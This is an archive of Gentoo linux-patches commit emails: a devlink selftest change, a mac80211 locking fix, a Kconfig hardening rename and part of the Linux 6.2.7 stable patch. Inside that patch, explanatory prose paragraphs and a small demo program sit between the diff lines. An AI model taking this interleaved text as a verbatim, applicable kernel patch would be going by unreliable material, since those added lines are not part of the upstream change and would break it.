+diff --git a/tools/testing/selftests/net/devlink_port_split.py b/tools/testing/selftests/net/devlink_port_split.py
+index 2b5d6ff873738..2d84c7a0be6b2 100755
+--- a/tools/testing/selftests/net/devlink_port_split.py
++++ b/tools/testing/selftests/net/devlink_port_split.py
+@@ -59,6 +59,8 @@ class devlink_ports(object):
+         assert stderr == ""
+         ports = json.loads(stdout)['port']
+ 
++        validate_devlink_output(ports, 'flavour')
++
+         for port in ports:
+             if dev in port:
+                 if ports[port]['flavour'] == 'physical':
+@@ -220,6 +222,27 @@ def split_splittable_port(port, k, lanes, dev):
+     unsplit(port.bus_info)
+ 
+ 
++def validate_devlink_output(devlink_data, target_property=None):
++    """
++    Determine if test should be skipped by checking:
++      1. devlink_data contains values
++      2. The target_property exist in devlink_data
++    """
++    skip_reason = None
++    if any(devlink_data.values()):
++        if target_property:
++            skip_reason = "{} not found in devlink output, test skipped".format(target_property)
++            for key in devlink_data:
++                if target_property in devlink_data[key]:
++                    skip_reason = None
++    else:
++        skip_reason = 'devlink output is empty, test skipped'
++
++    if skip_reason:
++        print(skip_reason)
++        sys.exit(KSFT_SKIP)
++
++
+ def make_parser():
+     parser = argparse.ArgumentParser(description='A test for port splitting.')
+     parser.add_argument('--dev',
+@@ -240,12 +263,9 @@ def main(cmdline=None):
+         stdout, stderr = run_command(cmd)
+         assert stderr == ""
+ 
++        validate_devlink_output(json.loads(stdout))
+         devs = json.loads(stdout)['dev']
+-        if devs:
+-            dev = list(devs.keys())[0]
+-        else:
+-            print("no devlink device was found, test skipped")
+-            sys.exit(KSFT_SKIP)
++        dev = list(devs.keys())[0]
+ 
+     cmd = "devlink dev show %s" % dev
+     stdout, stderr = run_command(cmd)
+@@ -255,6 +275,7 @@ def main(cmdline=None):
+ 
+     ports = devlink_ports(dev)
+ 
++    found_max_lanes = False
+     for port in ports.if_names:
+         max_lanes = get_max_lanes(port.name)
+ 
+@@ -277,6 +298,11 @@ def main(cmdline=None):
+                 split_splittable_port(port, lane, max_lanes, dev)
+ 
+                 lane //= 2
++        found_max_lanes = True
++
++    if not found_max_lanes:
++        print(f"Test not started, no port of device {dev} reports max_lanes")
++        sys.exit(KSFT_SKIP)
+ 
+ 
+ if __name__ == "__main__":


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-22 12:44 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-22 12:44 UTC (permalink / raw
  To: gentoo-commits

commit:     55b9f20a7c652003a1c0d85db1c8e9081437b6dc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 12:44:07 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 12:44:07 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=55b9f20a

wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue

Bug: https://bugs.gentoo.org/902715

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...-serialize-ieee80211-handle-wake-tx-queue.patch | 84 ++++++++++++++++++++++
 2 files changed, 88 insertions(+)

diff --git a/0000_README b/0000_README
index e2a4cc67..110a64f7 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
+Desc:   wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
new file mode 100644
index 00000000..ed730a0a
--- /dev/null
+++ b/2400_WiFi-mac80211-serialize-ieee80211-handle-wake-tx-queue.patch
@@ -0,0 +1,84 @@
+From 007ae9b268ba7553e479608cf9735d3c4672a2ab Mon Sep 17 00:00:00 2001
+From: Alexander Wetzel <alexander@wetzel-home.de>
+Date: Tue, 14 Mar 2023 22:11:22 +0100
+Subject: wifi: mac80211: Serialize ieee80211_handle_wake_tx_queue()
+
+ieee80211_handle_wake_tx_queue() must not run concurrently multiple times.
+It calls ieee80211_txq_schedule_start() and the drivers migrated to iTXQ
+do not expect overlapping drv_tx() calls.
+
+This fixes 'c850e31f79f0 ("wifi: mac80211: add internal handler for
+wake_tx_queue")', which introduced ieee80211_handle_wake_tx_queue.
+Drivers started to use it with 'a790cc3a4fad ("wifi: mac80211: add
+wake_tx_queue callback to drivers")'.
+But only after an independent bug was fixed by
+'4444bc2116ae ("wifi: mac80211: Proper mark iTXQs for resumption")'
+did problematic concurrent calls actually happen and expose the
+initial issue.
+
+Fixes: c850e31f79f0 ("wifi: mac80211: add internal handler for wake_tx_queue")
+Reported-by: Thomas Mann <rauchwolke@gmx.net>
+Link: https://bugzilla.kernel.org/show_bug.cgi?id=217119
+Link: https://lore.kernel.org/r/b8efebc6-4399-d0b8-b2a0-66843314616b@leemhuis.info/
+Link: https://lore.kernel.org/r/b7445607128a6b9ed7c17fcdcf3679bfaf4aaea.camel@sipsolutions.net>
+CC: <stable@vger.kernel.org>
+Signed-off-by: Alexander Wetzel <alexander@wetzel-home.de>
+Link: https://lore.kernel.org/r/20230314211122.111688-1-alexander@wetzel-home.de
+[add missing spin_lock_init() noticed by Felix]
+Signed-off-by: Johannes Berg <johannes.berg@intel.com>
+---
+ net/mac80211/ieee80211_i.h | 3 +++
+ net/mac80211/main.c        | 2 ++
+ net/mac80211/util.c        | 3 +++
+ 3 files changed, 8 insertions(+)
+
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index ecc232eb1ee82..e082582e0aa28 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1284,6 +1284,9 @@ struct ieee80211_local {
+ 	struct list_head active_txqs[IEEE80211_NUM_ACS];
+ 	u16 schedule_round[IEEE80211_NUM_ACS];
+ 
++	/* serializes ieee80211_handle_wake_tx_queue */
++	spinlock_t handle_wake_tx_queue_lock;
++
+ 	u16 airtime_flags;
+ 	u32 aql_txq_limit_low[IEEE80211_NUM_ACS];
+ 	u32 aql_txq_limit_high[IEEE80211_NUM_ACS];
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 846528850612a..ddf2b7811c557 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -802,6 +802,8 @@ struct ieee80211_hw *ieee80211_alloc_hw_nm(size_t priv_data_len,
+ 	local->aql_threshold = IEEE80211_AQL_THRESHOLD;
+ 	atomic_set(&local->aql_total_pending_airtime, 0);
+ 
++	spin_lock_init(&local->handle_wake_tx_queue_lock);
++
+ 	INIT_LIST_HEAD(&local->chanctx_list);
+ 	mutex_init(&local->chanctx_mtx);
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 1a28fe5cb614f..3aceb3b731bf4 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -314,6 +314,8 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(txq->vif);
+ 	struct ieee80211_txq *queue;
+ 
++	spin_lock(&local->handle_wake_tx_queue_lock);
++
+ 	/* Use ieee80211_next_txq() for airtime fairness accounting */
+ 	ieee80211_txq_schedule_start(hw, txq->ac);
+ 	while ((queue = ieee80211_next_txq(hw, txq->ac))) {
+@@ -321,6 +323,7 @@ void ieee80211_handle_wake_tx_queue(struct ieee80211_hw *hw,
+ 		ieee80211_return_txq(hw, queue, false);
+ 	}
+ 	ieee80211_txq_schedule_end(hw, txq->ac);
++	spin_unlock(&local->handle_wake_tx_queue_lock);
+ }
+ EXPORT_SYMBOL(ieee80211_handle_wake_tx_queue);
+ 
+-- 
+cgit 


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-21 13:32 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-21 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     e27a3bae2be6d57dff9df453cf9a94feff41e1eb
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Mar 21 12:58:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Mar 21 13:32:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e27a3bae

Fix config change from X86_X32 to X86_X32_ABI

Thanks to Frank Limpert

Bug: https://bugs.gentoo.org/902443

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9e0701dd..9cb1eb0c 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -185,7 +185,7 @@
 +config GENTOO_KERNEL_SELF_PROTECTION_COMMON
 +	bool "Enable Kernel Self Protection Project Recommendations"
 +
-+	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32 && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
++	depends on GENTOO_LINUX && !ACPI_CUSTOM_METHOD && !COMPAT_BRK && !PROC_KCORE && !COMPAT_VDSO && !KEXEC && !HIBERNATION && !LEGACY_PTYS && !X86_X32_ABI && !MODIFY_LDT_SYSCALL && GCC_PLUGINS && !IOMMU_DEFAULT_DMA_LAZY && !IOMMU_DEFAULT_PASSTHROUGH && IOMMU_DEFAULT_DMA_STRICT && SECURITY && !ARCH_EPHEMERAL_INODES  && RANDSTRUCT_PERFORMANCE
 +
 +	select BUG
 +	select STRICT_KERNEL_RWX


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-17 10:42 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-17 10:42 UTC (permalink / raw
  To: gentoo-commits

commit:     ccdee9668ab77080ab6207ee330310b3f14a0d86
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 17 10:42:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 17 10:42:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ccdee966

Linux patch 6.2.7

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1006_linux-6.2.7.patch | 5559 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5563 insertions(+)

diff --git a/0000_README b/0000_README
index d40230d0..e2a4cc67 100644
--- a/0000_README
+++ b/0000_README
@@ -67,6 +67,10 @@ Patch:  1005_linux-6.2.6.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.6
 
+Patch:  1006_linux-6.2.7.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.7
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1006_linux-6.2.7.patch b/1006_linux-6.2.7.patch
new file mode 100644
index 00000000..174f612d
--- /dev/null
+++ b/1006_linux-6.2.7.patch
@@ -0,0 +1,5559 @@
+diff --git a/Makefile b/Makefile
+index 70e66e7716086..43cf2c785cb1f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 6
++SUBLEVEL = 7
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/kernel/module.c b/arch/alpha/kernel/module.c
+index 5b60c248de9ea..cbefa5a773846 100644
+--- a/arch/alpha/kernel/module.c
++++ b/arch/alpha/kernel/module.c
+@@ -146,10 +146,8 @@ apply_relocate_add(Elf64_Shdr *sechdrs, const char *strtab,
+ 	base = (void *)sechdrs[sechdrs[relsec].sh_info].sh_addr;
+ 	symtab = (Elf64_Sym *)sechdrs[symindex].sh_addr;
+ 
+-	/* The small sections were sorted to the end of the segment.
+-	   The following should definitely cover them.  */
+-	gp = (u64)me->core_layout.base + me->core_layout.size - 0x8000;
+ 	got = sechdrs[me->arch.gotsecindex].sh_addr;
++	gp = got + 0x8000;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		unsigned long r_sym = ELF64_R_SYM (rela[i].r_info);
+diff --git a/arch/m68k/kernel/setup_mm.c b/arch/m68k/kernel/setup_mm.c
+index 3a2bb2e8fdad4..fbff1cea62caa 100644
+--- a/arch/m68k/kernel/setup_mm.c
++++ b/arch/m68k/kernel/setup_mm.c
+@@ -326,16 +326,16 @@ void __init setup_arch(char **cmdline_p)
+ 		panic("No configuration setup");
+ 	}
+ 
+-#ifdef CONFIG_BLK_DEV_INITRD
+-	if (m68k_ramdisk.size) {
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size)
+ 		memblock_reserve(m68k_ramdisk.addr, m68k_ramdisk.size);
++
++	paging_init();
++
++	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && m68k_ramdisk.size) {
+ 		initrd_start = (unsigned long)phys_to_virt(m68k_ramdisk.addr);
+ 		initrd_end = initrd_start + m68k_ramdisk.size;
+ 		pr_info("initrd: %08lx - %08lx\n", initrd_start, initrd_end);
+ 	}
+-#endif
+-
+-	paging_init();
+ 
+ #ifdef CONFIG_NATFEAT
+ 	nf_init();
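The m68k hunk above trades #ifdef blocks for IS_ENABLED() conditions, which keeps the initrd code visible to the compiler in every configuration (so it cannot silently bitrot) while the optimizer still discards it when the option is off; it also makes it easy to move paging_init() between the two initrd steps without duplicating guards. A runnable sketch with a simplified stand-in macro; the kernel's real IS_ENABLED() in <linux/kconfig.h> also copes with undefined and modular options.

	#include <stdio.h>

	#define CONFIG_DEMO_FEATURE 1

	/* simplified stand-in: expands to the option's 0/1 value */
	#define IS_ENABLED(option) (option)

	int main(void)
	{
		/* always parsed and type-checked; dead-code-eliminated when 0 */
		if (IS_ENABLED(CONFIG_DEMO_FEATURE))
			printf("feature enabled\n");
		return 0;
	}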
+diff --git a/arch/mips/include/asm/mach-rc32434/pci.h b/arch/mips/include/asm/mach-rc32434/pci.h
+index 9a6eefd127571..3eb767c8a4eec 100644
+--- a/arch/mips/include/asm/mach-rc32434/pci.h
++++ b/arch/mips/include/asm/mach-rc32434/pci.h
+@@ -374,7 +374,7 @@ struct pci_msu {
+ 				 PCI_CFG04_STAT_SSE | \
+ 				 PCI_CFG04_STAT_PE)
+ 
+-#define KORINA_CNFG1		((KORINA_STAT<<16)|KORINA_CMD)
++#define KORINA_CNFG1		(KORINA_STAT | KORINA_CMD)
+ 
+ #define KORINA_REVID		0
+ #define KORINA_CLASS_CODE	0
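The KORINA_CNFG1 fix suggests the status bits ORed into KORINA_STAT are already defined in the upper half of the 32-bit command/status word, so shifting the composite left by 16 again pushed them past bit 31 and zeroed them; ORing the two halves directly is the correct composition. A runnable sketch of the double-shift failure, with illustrative bit positions rather than the real Korina register layout.

	#include <stdio.h>

	#define DEMO_STAT_BIT (1u << 24)	/* already placed in the upper half-word */
	#define DEMO_CMD_BIT  (1u << 2)

	int main(void)
	{
		unsigned int buggy = (DEMO_STAT_BIT << 16) | DEMO_CMD_BIT; /* status bit lost */
		unsigned int fixed = DEMO_STAT_BIT | DEMO_CMD_BIT;

		printf("buggy: 0x%08x  fixed: 0x%08x\n", buggy, fixed);
		return 0;
	}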
+diff --git a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+index 73f8c998c64df..d4f5f159d6f23 100644
+--- a/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
++++ b/arch/powerpc/boot/dts/fsl/t1040rdb-rev-a.dts
+@@ -10,7 +10,6 @@
+ 
+ / {
+ 	model = "fsl,T1040RDB-REV-A";
+-	compatible = "fsl,T1040RDB-REV-A";
+ };
+ 
+ &seville_port0 {
+diff --git a/arch/powerpc/include/asm/hw_irq.h b/arch/powerpc/include/asm/hw_irq.h
+index eb6d094083fd6..317659fdeacf2 100644
+--- a/arch/powerpc/include/asm/hw_irq.h
++++ b/arch/powerpc/include/asm/hw_irq.h
+@@ -36,15 +36,17 @@
+ #define PACA_IRQ_DEC		0x08 /* Or FIT */
+ #define PACA_IRQ_HMI		0x10
+ #define PACA_IRQ_PMI		0x20
++#define PACA_IRQ_REPLAYING	0x40
+ 
+ /*
+  * Some soft-masked interrupts must be hard masked until they are replayed
+  * (e.g., because the soft-masked handler does not clear the exception).
++ * Interrupt replay itself must remain hard masked too.
+  */
+ #ifdef CONFIG_PPC_BOOK3S
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_PMI|PACA_IRQ_REPLAYING)
+ #else
+-#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE)
++#define PACA_IRQ_MUST_HARD_MASK	(PACA_IRQ_EE|PACA_IRQ_REPLAYING)
+ #endif
+ 
+ #endif /* CONFIG_PPC64 */
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 09f1790d0ae16..0ab3511a47d77 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -295,7 +295,6 @@ extern void free_unused_pacas(void);
+ 
+ #else /* CONFIG_PPC64 */
+ 
+-static inline void allocate_paca_ptrs(void) { }
+ static inline void allocate_paca(int cpu) { }
+ static inline void free_unused_pacas(void) { }
+ 
+diff --git a/arch/powerpc/include/asm/smp.h b/arch/powerpc/include/asm/smp.h
+index f63505d74932b..6c6cb53d70458 100644
+--- a/arch/powerpc/include/asm/smp.h
++++ b/arch/powerpc/include/asm/smp.h
+@@ -26,6 +26,7 @@
+ #include <asm/percpu.h>
+ 
+ extern int boot_cpuid;
++extern int boot_cpu_hwid; /* PPC64 only */
+ extern int spinning_secondaries;
+ extern u32 *cpu_to_phys_id;
+ extern bool coregroup_enabled;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index caebe1431596e..ee95937bdaf14 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -67,11 +67,9 @@ static void iommu_debugfs_add(struct iommu_table *tbl)
+ static void iommu_debugfs_del(struct iommu_table *tbl)
+ {
+ 	char name[10];
+-	struct dentry *liobn_entry;
+ 
+ 	sprintf(name, "%08lx", tbl->it_index);
+-	liobn_entry = debugfs_lookup(name, iommu_debugfs_dir);
+-	debugfs_remove(liobn_entry);
++	debugfs_lookup_and_remove(name, iommu_debugfs_dir);
+ }
+ #else
+ static void iommu_debugfs_add(struct iommu_table *tbl){}
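The iommu hunk fixes a reference leak: debugfs_lookup() returns the dentry with an extra reference that this caller never dropped, so every table teardown pinned a dentry forever; debugfs_lookup_and_remove() does the lookup, the removal, and the reference drop in one call. A hedged kernel-style sketch of the replacement API; the demo names are illustrative.

	#include <linux/debugfs.h>
	#include <linux/kernel.h>

	static struct dentry *demo_dir;	/* created elsewhere via debugfs_create_dir() */

	static void demo_del_entry(unsigned long index)
	{
		char name[10];

		sprintf(name, "%08lx", index);
		/* find the child, remove it, and drop the lookup reference */
		debugfs_lookup_and_remove(name, demo_dir);
	}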
+diff --git a/arch/powerpc/kernel/irq_64.c b/arch/powerpc/kernel/irq_64.c
+index eb2b380e52a0d..9dc0ad3c533a8 100644
+--- a/arch/powerpc/kernel/irq_64.c
++++ b/arch/powerpc/kernel/irq_64.c
+@@ -70,22 +70,19 @@ int distribute_irqs = 1;
+ 
+ static inline void next_interrupt(struct pt_regs *regs)
+ {
+-	/*
+-	 * Softirq processing can enable/disable irqs, which will leave
+-	 * MSR[EE] enabled and the soft mask set to IRQS_DISABLED. Fix
+-	 * this up.
+-	 */
+-	if (!(local_paca->irq_happened & PACA_IRQ_HARD_DIS))
+-		hard_irq_disable();
+-	else
+-		irq_soft_mask_set(IRQS_ALL_DISABLED);
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(irq_soft_mask_return() != IRQS_ALL_DISABLED);
++	}
+ 
+ 	/*
+ 	 * We are responding to the next interrupt, so interrupt-off
+ 	 * latencies should be reset here.
+ 	 */
++	lockdep_hardirq_exit();
+ 	trace_hardirqs_on();
+ 	trace_hardirqs_off();
++	lockdep_hardirq_enter();
+ }
+ 
+ static inline bool irq_happened_test_and_clear(u8 irq)
+@@ -97,22 +94,11 @@ static inline bool irq_happened_test_and_clear(u8 irq)
+ 	return false;
+ }
+ 
+-void replay_soft_interrupts(void)
++static void __replay_soft_interrupts(void)
+ {
+ 	struct pt_regs regs;
+ 
+ 	/*
+-	 * Be careful here, calling these interrupt handlers can cause
+-	 * softirqs to be raised, which they may run when calling irq_exit,
+-	 * which will cause local_irq_enable() to be run, which can then
+-	 * recurse into this function. Don't keep any state across
+-	 * interrupt handler calls which may change underneath us.
+-	 *
+-	 * Softirqs can not be disabled over replay to stop this recursion
+-	 * because interrupts taken in idle code may require RCU softirq
+-	 * to run in the irq RCU tracking context. This is a hard problem
+-	 * to fix without changes to the softirq or idle layer.
+-	 *
+ 	 * We use local_paca rather than get_paca() to avoid all the
+ 	 * debug_smp_processor_id() business in this low level function.
+ 	 */
+@@ -120,13 +106,20 @@ void replay_soft_interrupts(void)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
+ 		WARN_ON_ONCE(mfmsr() & MSR_EE);
+ 		WARN_ON(!(local_paca->irq_happened & PACA_IRQ_HARD_DIS));
++		WARN_ON(local_paca->irq_happened & PACA_IRQ_REPLAYING);
+ 	}
+ 
++	/*
++	 * PACA_IRQ_REPLAYING prevents interrupt handlers from enabling
++	 * MSR[EE] to get PMIs, which can result in more IRQs becoming
++	 * pending.
++	 */
++	local_paca->irq_happened |= PACA_IRQ_REPLAYING;
++
+ 	ppc_save_regs(&regs);
+ 	regs.softe = IRQS_ENABLED;
+ 	regs.msr |= MSR_EE;
+ 
+-again:
+ 	/*
+ 	 * Force the delivery of pending soft-disabled interrupts on PS3.
+ 	 * Any HV call will have this side effect.
+@@ -175,13 +168,14 @@ again:
+ 		next_interrupt(&regs);
+ 	}
+ 
+-	/*
+-	 * Softirq processing can enable and disable interrupts, which can
+-	 * result in new irqs becoming pending. Must keep looping until we
+-	 * have cleared out all pending interrupts.
+-	 */
+-	if (local_paca->irq_happened & ~PACA_IRQ_HARD_DIS)
+-		goto again;
++	local_paca->irq_happened &= ~PACA_IRQ_REPLAYING;
++}
++
++void replay_soft_interrupts(void)
++{
++	irq_enter(); /* See comment in arch_local_irq_restore */
++	__replay_soft_interrupts();
++	irq_exit();
+ }
+ 
+ #if defined(CONFIG_PPC_BOOK3S_64) && defined(CONFIG_PPC_KUAP)
+@@ -200,13 +194,13 @@ static inline void replay_soft_interrupts_irqrestore(void)
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(AMR_KUAP_BLOCKED);
+ 
+-	replay_soft_interrupts();
++	__replay_soft_interrupts();
+ 
+ 	if (kuap_state != AMR_KUAP_BLOCKED)
+ 		set_kuap(kuap_state);
+ }
+ #else
+-#define replay_soft_interrupts_irqrestore() replay_soft_interrupts()
++#define replay_soft_interrupts_irqrestore() __replay_soft_interrupts()
+ #endif
+ 
+ notrace void arch_local_irq_restore(unsigned long mask)
+@@ -219,9 +213,13 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 		return;
+ 	}
+ 
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON_ONCE(in_nmi() || in_hardirq());
++	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG)) {
++		WARN_ON_ONCE(in_nmi());
++		WARN_ON_ONCE(in_hardirq());
++		WARN_ON_ONCE(local_paca->irq_happened & PACA_IRQ_REPLAYING);
++	}
+ 
++again:
+ 	/*
+ 	 * After the stb, interrupts are unmasked and there are no interrupts
+ 	 * pending replay. The restart sequence makes this atomic with
+@@ -248,6 +246,12 @@ notrace void arch_local_irq_restore(unsigned long mask)
+ 	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+ 		WARN_ON_ONCE(!(mfmsr() & MSR_EE));
+ 
++	/*
++	 * If we came here from the replay below, we might have a preempt
++	 * pending (due to preempt_enable_no_resched()). Have to check now.
++	 */
++	preempt_check_resched();
++
+ 	return;
+ 
+ happened:
+@@ -261,6 +265,7 @@ happened:
+ 		irq_soft_mask_set(IRQS_ENABLED);
+ 		local_paca->irq_happened = 0;
+ 		__hard_irq_enable();
++		preempt_check_resched();
+ 		return;
+ 	}
+ 
+@@ -296,12 +301,38 @@ happened:
+ 	irq_soft_mask_set(IRQS_ALL_DISABLED);
+ 	trace_hardirqs_off();
+ 
++	/*
++	 * Now enter interrupt context. The interrupt handlers themselves
++	 * also call irq_enter/exit (which is okay, they can nest). But call
++	 * it here now to hold off softirqs until the below irq_exit(). If
++	 * we allowed replayed handlers to run softirqs, that enables irqs,
++	 * which must replay interrupts, which recurses in here and makes
++	 * things more complicated. The recursion is limited to 2, and it can
++	 * be made to work, but it's complicated.
++	 *
++	 * local_bh_disable can not be used here because interrupts taken in
++	 * idle are not in the right context (RCU, tick, etc) to run softirqs
++	 * so irq_enter must be called.
++	 */
++	irq_enter();
++
+ 	replay_soft_interrupts_irqrestore();
+ 
++	irq_exit();
++
++	if (unlikely(local_paca->irq_happened != PACA_IRQ_HARD_DIS)) {
++		/*
++		 * The softirq processing in irq_exit() may enable interrupts
++		 * temporarily, which can result in MSR[EE] being enabled and
++		 * more irqs becoming pending. Go around again if that happens.
++		 */
++		trace_hardirqs_on();
++		preempt_enable_no_resched();
++		goto again;
++	}
++
+ 	trace_hardirqs_on();
+ 	irq_soft_mask_set(IRQS_ENABLED);
+-	if (IS_ENABLED(CONFIG_PPC_IRQ_SOFT_MASK_DEBUG))
+-		WARN_ON(local_paca->irq_happened != PACA_IRQ_HARD_DIS);
+ 	local_paca->irq_happened = 0;
+ 	__hard_irq_enable();
+ 	preempt_enable();
+diff --git a/arch/powerpc/kernel/process.c b/arch/powerpc/kernel/process.c
+index c22cc234672f9..effe9697905dc 100644
+--- a/arch/powerpc/kernel/process.c
++++ b/arch/powerpc/kernel/process.c
+@@ -1405,8 +1405,7 @@ static void show_instructions(struct pt_regs *regs)
+ 	for (i = 0; i < NR_INSN_TO_PRINT; i++) {
+ 		int instr;
+ 
+-		if (!__kernel_text_address(pc) ||
+-		    get_kernel_nofault(instr, (const void *)pc)) {
++		if (get_kernel_nofault(instr, (const void *)pc)) {
+ 			pr_cont("XXXXXXXX ");
+ 		} else {
+ 			if (nip == pc)
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 4f1c920aa13ed..f318e8e1f3fe4 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -370,8 +370,8 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	    be32_to_cpu(intserv[found_thread]));
+ 	boot_cpuid = found;
+ 
+-	// Pass the boot CPU's hard CPU id back to our caller
+-	*((u32 *)data) = be32_to_cpu(intserv[found_thread]);
++	if (IS_ENABLED(CONFIG_PPC64))
++		boot_cpu_hwid = be32_to_cpu(intserv[found_thread]);
+ 
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+@@ -755,7 +755,6 @@ static inline void save_fscr_to_task(void) {}
+ 
+ void __init early_init_devtree(void *params)
+ {
+-	u32 boot_cpu_hwid;
+ 	phys_addr_t limit;
+ 
+ 	DBG(" -> early_init_devtree(%px)\n", params);
+@@ -851,7 +850,7 @@ void __init early_init_devtree(void *params)
+ 	/* Retrieve CPU related information from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+-	of_scan_flat_dt(early_init_dt_scan_cpus, &boot_cpu_hwid);
++	of_scan_flat_dt(early_init_dt_scan_cpus, NULL);
+ 	if (boot_cpuid < 0) {
+ 		printk("Failed to identify boot CPU !\n");
+ 		BUG();
+@@ -868,11 +867,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	mmu_early_init_devtree();
+ 
+-	// NB. paca is not installed until later in early_setup()
+-	allocate_paca_ptrs();
